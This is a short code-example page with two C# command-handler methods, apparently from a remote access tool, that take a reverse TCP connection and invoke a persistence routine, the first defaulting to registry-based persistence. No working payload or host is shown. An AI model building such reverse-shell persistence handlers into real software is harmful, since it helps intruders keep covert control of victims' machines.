Exemplo n.º 1
0
        public void Execute(TcpReverseConnection connection, string[] commandArguments)
        {
            this.connection = connection;
            Persistence p = new Persistence(connection);

            // Check if arg was supplied - if not, use default method
            if (commandArguments.Length == 1)
            {
                p.Execute("Registry");
            }
        }
Exemplo n.º 2
0
 public void Execute(TcpReverseConnection connection, string[] commandArguments)
 {
     this.connection = connection;
     Persistence p = new Persistence();
 }